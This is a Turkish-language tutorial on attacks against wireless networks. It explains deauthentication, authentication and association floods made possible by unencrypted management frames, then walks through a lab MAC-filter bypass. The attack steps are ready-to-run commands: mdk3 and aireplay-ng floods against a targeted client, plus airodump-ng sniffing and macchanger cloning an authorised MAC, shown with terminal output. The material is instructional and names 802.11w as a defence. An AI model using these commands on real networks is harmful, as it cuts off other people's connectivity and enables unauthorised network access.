Kablosuz Ağlara Yönelik Saldırı Çeşitleri
Kablosuz Ağlara Yönelik DoS Saldırıları
WEP’ten sonra WPA ve WPA2 ile kablosuz ağlarda CCMP kullanılarak güvenlik standartı yükseltilsede, bu koruma sadece data framelere uygulanabiliyordu. Management frameler ile ilgili bir işlem ise yoktu. Yani management frameler şifresiz ve manipüle edilebilir durumdadır. Management framelerin bu özelliği kablosuz ağları DoS ataklara açık bırakmaktadır.
Gerçek hayatta karşılaşılan birçok Dos atak çeşidi(HTTP Flood, TCP SYN flood, ICMP flood) kablosuz ağlarda da uygulanabilir. Ancak kablosuz ağlara özel olan DoS saldırılarıda vardır. Bu saldırılar OSI modelinde, iletişimin frame(çerçeve)ler ile sağlandığı 2.katmanında(Data link layer) uygulanır. (Fiziksel katmanda jammerlar ile sinyaller bozularakta iletişim engellenebilir.)
Yapılan saldırılar authentication/association flood ve deauthentication/disassociation flood şeklindedir.
Bir istemcinin, AP ile bağlantı kurma aşaması kabaca şu şekilde gerçekleşir:
-
İstemci authentication isteğinde bulunur.
-
AP authentication cevabı yollar.
-
İstemci assocation isteğinde bulunur.
-
AP assocation cevabı yollar.
Association işlemi için authentication şarttır. Bir istemci birden fazla sisteme authentication kurmuş olabilir ancak sadece bir AP ile association kurabilir.
Saldırıyı belli bir kullanıcıya(bilgisayara) yönlendirmek için bu işlemlerden önce airodump-ng, Kısmet gibi araçlarla hedef kablosuz ağa bağlı kullanıcılara keşif çalışması yapılabilir.
(Bu saldırılar iletişimi bir süre kesintiye uğratabilir, AP’yi yeniden başlatmak gerekebilir. )
Authentication atak için;
mdk3 mon0 a -m -i F8:D1:11:40:D2:8E
|
Deauthentication frame, istemci veya AP tarafından bağlantıyı sonlandırmak amacıyla gönderilir.
Deauthentication atak yapması çok kolaydır. Bunun için mdk3 kullanılmıştır. Broadcast MAC adrese gönderilecek sahte frameler ile kablosuz ağa bağlı tüm istemciler ağdan düşürülebilir. -b ile deauthentication saldırısı yapılacak MAC adreslerinin olduğu dosya okutulur.
mdk3 mon0 d -b mac_adresi_listesi -c 4
aireplay-ng –deauth 20 -a 00:1F:D4:01:6A:C8 -c 00:27:10:5C:08:18 mon0
|
Association flood:
AP association sağlanmış her istemci için bir tablo tutar. Bu tarz atakta sınırlı belleğe sahip tablonun doldurulması ve yeni istemcilerin bağlananaması amaçlanır. Bunun için sürekli değişen MAC adresleri ile AP’ye association istekleri gönderilir.
IEEE 802.11w ile management frameler şifreli olarak gönderilebilmektedir. Ancak bu standart henüz yaygınlaşmamıştır.
Mac Adres Filtreleme Önlemlerinin Atlatılması
Kablosuz ağ için uygulanabilecek güvenlik önlemlerinden biriside MAC adresi filtrelemesidir. Bir çok switch/modem tarafından desteklenen bu özellikle sadece istenen MAC adreslerinin kablosuz ağa bağlanması sağlanabilir. Ancak bu koruma, ağa bağlı kullanıcılar tespit edilerek atlatılabilir.
1. adım ağa bağlanma yetkisi olan istemcilerin tespiti
2. adım ağa bağlanma yetkisi olan MAC adreslerinin klonlanması
3. adım erişim izni olan MAC adresi ile birlikte ağa bağlanma denemesi
Aşağıdaki gibi hedef kablosuz ağa bağlı kullanıcı bilgileri sniff edilmeye başlanmıştır.
airodump-ng mon0 –bssid 18:28:61:3B:3B:1E -c 3
|
Ağa bağlı gözüken 4 kullanıcıdan sadece ortada bulunan 2 tanesinin MAC adresleri modem üzerinde tanımlanmıştır. Hedef olarak 00:23:08:E9:B4:DF MAC adresli kullanıcı alınmıştır.
CH 3 ][ Elapsed: 1 min ][ 2014-05-15 19:40 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
18:28:61:3B:3B:1E -35 100 366 355 0 3 54e WPA2 CCMP PSK Korsan
BSSID STATION PWR Rate Lost Frames Probe
18:28:61:3B:3B:1E A0:F3:C1:27:BF:E8 0 0 – 1 0 1
18:28:61:3B:3B:1E 20:C9:D0:BF:7D:F1 -31 54e-54 0 226
18:28:61:3B:3B:1E 00:23:08:E9:B4:DF -46 54e-54e 0 129
18:28:61:3B:3B:1E 28:BA:B5:39:C0:1D -49 0 – 1 0 4
|
Bu ağa bağlanılmak istendiğinde aşağıdaki gibi Access Point: Not-Associated olarak gözükmektedir.
root@kali:~# iwconfig wlan1
wlan1 IEEE 802.11bgn ESSID:”Korsan”
Mode:Managed Frequency:2.422 GHz Access Point: Not-Associated
Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
|
Atlatmak için MAC adresimizi hedef olarak belirlenen MAC adresi ile değiştiririz. Bunu yapabilmek için kablosuz ağa bağlı arayüz down hale getirilir. MAC adresi değiştirildikten sonra tekrar up yapılır.
root@kali:~# ifconfig wlan1 down
root@kali:~# macchanger -m 00:23:08:E9:B4:DF wlan1
Permanent MAC: a0:f3:c1:27:bf:e8 (unknown)
Current MAC: a0:f3:c1:27:bf:e8 (unknown)
New MAC: 00:23:08:e9:b4:df (Arcadyan Technology Corporation)
root@kali:~# ifconfig wlan1 up
|
Kablosuz ağa tekrar bağlanılmaya çalışıldığında sonuç aşağıdaki gibi başarılıdır.
wlan1 IEEE 802.11bgn ESSID:”Korsan”
Mode:Managed Frequency:2.422 GHz Access Point: 18:28:61:3B:3B:1E
Bit Rate=54 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=70/70 Signal level=-36 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:232 Missed beacon:0
|
Bazen ağda aynı MAC adresi 2 defa olduğu için IP alma konusunda sıkıntılar yaşanabilir. Bunun için MAC adresini değiştirmeden önce hedef istemciye özel deauthentication saldırısı yapılıp ağdan düşürülebilir.
root@kali:~# aireplay-ng –deauth 50 -a 18:28:61:3B:3B:1E -c 00:23:08:e9:b4:df mon0
|
50, gönderilecek deauthentication paketlerinin sayısını
-a, APnin MAC adresini
-c, hedef istemcinin MAC adresini ifade eder.
mon0 ise atağın yapıldığı kablosuz ağ arayüzüdür.